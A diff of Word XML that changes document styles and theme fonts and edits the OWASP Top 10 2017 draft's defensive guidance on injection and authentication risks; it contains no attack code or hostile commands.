+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
     <w:name w:val="NormalTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="007A100A"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="00549E"/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
+    <w:name w:val="Heading 2 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="00549E"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
+    <w:name w:val="Heading 3 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="00549E"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
+    <w:name w:val="Heading 4 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading4"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
+    <w:name w:val="Heading 5 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading5"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="22"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
+    <w:name w:val="Heading 6 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading6"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
+    <w:name w:val="Heading 7 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading7"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
+    <w:name w:val="Heading 8 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading8"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:smallCaps/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
+    <w:name w:val="Heading 9 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading9"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:smallCaps/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
+    <w:name w:val="Title Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Title"/>
+    <w:uiPriority w:val="10"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:spacing w:val="-7"/>
+      <w:sz w:val="80"/>
+      <w:szCs w:val="80"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
+    <w:name w:val="Subtitle Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Subtitle"/>
+    <w:uiPriority w:val="11"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="30"/>
+      <w:szCs w:val="30"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Strong">
+    <w:name w:val="Strong"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="22"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Emphasis">
+    <w:name w:val="Emphasis"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="20"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="NoSpacing">
+    <w:name w:val="No Spacing"/>
+    <w:uiPriority w:val="1"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Quote">
+    <w:name w:val="Quote"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="QuoteChar"/>
+    <w:uiPriority w:val="29"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:spacing w:before="240" w:after="240" w:line="252" w:lineRule="auto"/>
+      <w:ind w:left="864" w:right="864"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
+    <w:name w:val="Quote Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Quote"/>
+    <w:uiPriority w:val="29"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="IntenseQuote">
+    <w:name w:val="Intense Quote"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="IntenseQuoteChar"/>
+    <w:uiPriority w:val="30"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
+      <w:ind w:left="864" w:right="864"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="4472C4" w:themeColor="accent1"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
+    <w:name w:val="Intense Quote Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="IntenseQuote"/>
+    <w:uiPriority w:val="30"/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="4472C4" w:themeColor="accent1"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="SubtleEmphasis">
+    <w:name w:val="Subtle Emphasis"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="19"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="IntenseEmphasis">
+    <w:name w:val="Intense Emphasis"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="21"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:i/>
+      <w:iCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="SubtleReference">
+    <w:name w:val="Subtle Reference"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="31"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:smallCaps/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="IntenseReference">
+    <w:name w:val="Intense Reference"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="32"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:smallCaps/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="BookTitle">
+    <w:name w:val="Book Title"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="33"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:smallCaps/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B3198D"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
+    <w:name w:val="Body Text Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="BodyText"/>
+    <w:rsid w:val="00B3198D"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00B3198D"/>
+    <w:rPr>
+      <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -11394,44 +12833,44 @@
         <a:sysClr val="window" lastClr="FFFFFF"/>
       </a:lt1>
       <a:dk2>
-        <a:srgbClr val="1F497D"/>
+        <a:srgbClr val="44546A"/>
       </a:dk2>
       <a:lt2>
-        <a:srgbClr val="EEECE1"/>
+        <a:srgbClr val="E7E6E6"/>
       </a:lt2>
       <a:accent1>
-        <a:srgbClr val="4F81BD"/>
+        <a:srgbClr val="4472C4"/>
       </a:accent1>
       <a:accent2>
-        <a:srgbClr val="C0504D"/>
+        <a:srgbClr val="ED7D31"/>
       </a:accent2>
       <a:accent3>
-        <a:srgbClr val="9BBB59"/>
+        <a:srgbClr val="A5A5A5"/>
       </a:accent3>
       <a:accent4>
-        <a:srgbClr val="8064A2"/>
+        <a:srgbClr val="FFC000"/>
       </a:accent4>
       <a:accent5>
-        <a:srgbClr val="4BACC6"/>
+        <a:srgbClr val="5B9BD5"/>
       </a:accent5>
       <a:accent6>
-        <a:srgbClr val="F79646"/>
+        <a:srgbClr val="70AD47"/>
       </a:accent6>
       <a:hlink>
-        <a:srgbClr val="0000FF"/>
+        <a:srgbClr val="0563C1"/>
       </a:hlink>
       <a:folHlink>
-        <a:srgbClr val="800080"/>
+        <a:srgbClr val="954F72"/>
       </a:folHlink>
     </a:clrScheme>
     <a:fontScheme name="Office">
       <a:majorFont>
-        <a:latin typeface="Calibri"/>
+        <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
-        <a:font script="Jpan" typeface="ＭＳ ゴシック"/>
+        <a:font script="Jpan" typeface="游ゴシック Light"/>
         <a:font script="Hang" typeface="맑은 고딕"/>
-        <a:font script="Hans" typeface="宋体"/>
+        <a:font script="Hans" typeface="等线 Light"/>
         <a:font script="Hant" typeface="新細明體"/>
         <a:font script="Arab" typeface="Times New Roman"/>
         <a:font script="Hebr" typeface="Times New Roman"/>
@@ -11458,14 +12897,32 @@
         <a:font script="Mong" typeface="Mongolian Baiti"/>
         <a:font script="Viet" typeface="Times New Roman"/>
         <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Cambria"/>
+        <a:latin typeface="Calibri" panose="020F0502020204030204"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
-        <a:font script="Jpan" typeface="ＭＳ 明朝"/>
+        <a:font script="Jpan" typeface="游明朝"/>
         <a:font script="Hang" typeface="맑은 고딕"/>
-        <a:font script="Hans" typeface="宋体"/>
+        <a:font script="Hans" typeface="等线"/>
         <a:font script="Hant" typeface="新細明體"/>
         <a:font script="Arab" typeface="Arial"/>
         <a:font script="Hebr" typeface="Arial"/>
@@ -11492,6 +12949,24 @@
         <a:font script="Mong" typeface="Mongolian Baiti"/>
         <a:font script="Viet" typeface="Arial"/>
         <a:font script="Uigh" typeface="Microsoft Uighur"/>
+        <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
       </a:minorFont>
     </a:fontScheme>
     <a:fmtScheme name="Office">

--- a/2017/OWASP-Top-10-2017-en.docx
+++ b/2017/OWASP-Top-10-2017-en.docx
@@ -11,7 +11,7 @@
           <wp:inline>
             <wp:extent cx="5943600" cy="1820742"/>
             <wp:effectExtent b="0" l="0" r="0" t="0"/>
-            <wp:docPr descr="" id="1" name="Picture"/>
+            <wp:docPr descr="OWASP LOGO" title="" id="1" name="Picture"/>
             <a:graphic>
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic>
@@ -328,7 +328,7 @@
           <wp:inline>
             <wp:extent cx="1109472" cy="402336"/>
             <wp:effectExtent b="0" l="0" r="0" t="0"/>
-            <wp:docPr descr="" id="1" name="Picture"/>
+            <wp:docPr descr="license" title="" id="1" name="Picture"/>
             <a:graphic>
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic>
@@ -1056,7 +1056,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
+        <w:numPr>
+          <w:numId w:val="1004"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</w:t>
@@ -1064,16 +1067,24 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s Java Encoder and similar libraries provide such escaping routines.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Positive or “white list” input validation is also recommended, but is not a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe. OWASP’s ESAPI has an extensible library of white list input validation routines.</w:t>
+        <w:numPr>
+          <w:numId w:val="1004"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If (1) is not available, you should escape special characters using the specific escape syntax for that interpreter. OWASP’s Java Encoder and similar libraries provide such escaping routines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1004"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Positive or “white list” input validation is also recommended, but is not a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1187,7 +1198,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1204,7 +1215,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1221,7 +1232,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1238,7 +1249,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1255,7 +1266,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1272,7 +1283,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1289,7 +1300,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1004"/>
+          <w:numId w:val="1005"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1316,7 +1327,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1005"/>
+          <w:numId w:val="1006"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1333,7 +1344,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1005"/>
+          <w:numId w:val="1006"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1350,7 +1361,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1005"/>
+          <w:numId w:val="1006"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1367,7 +1378,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1005"/>
+          <w:numId w:val="1006"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1384,7 +1395,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1005"/>
+          <w:numId w:val="1006"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -1399,10 +1410,33 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1006"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Do we have a non-vendor reference for this?</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId40">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">PortSwigger: Server-side template injection</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="a2-authentication-and-session-management"/>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkStart w:id="41" w:name="a2-authentication-and-session-management"/>
+      <w:bookmarkEnd w:id="41"/>
       <w:r>
         <w:t xml:space="preserve">A2 Authentication and Session Management</w:t>
       </w:r>
@@ -1540,40 +1574,40 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">EASY</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">COMMON</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">AVERAGE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">SEVERE</w:t>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1585,63 +1619,6 @@
             </w:pPr>
             <w:r>
               <w:t xml:space="preserve">App Specific</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1652,137 +1629,145 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
+        <w:t xml:space="preserve">This issue is easily exploitable by manual means using freely available off the self tools and techniques. This issue is found in 40% of all assessments. The impact of exploitation is compromise of at least one targeted account, and often millions of accounts for undirected attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="42" w:name="am-i-vulnerable-to-attack-1"/>
+      <w:bookmarkEnd w:id="42"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
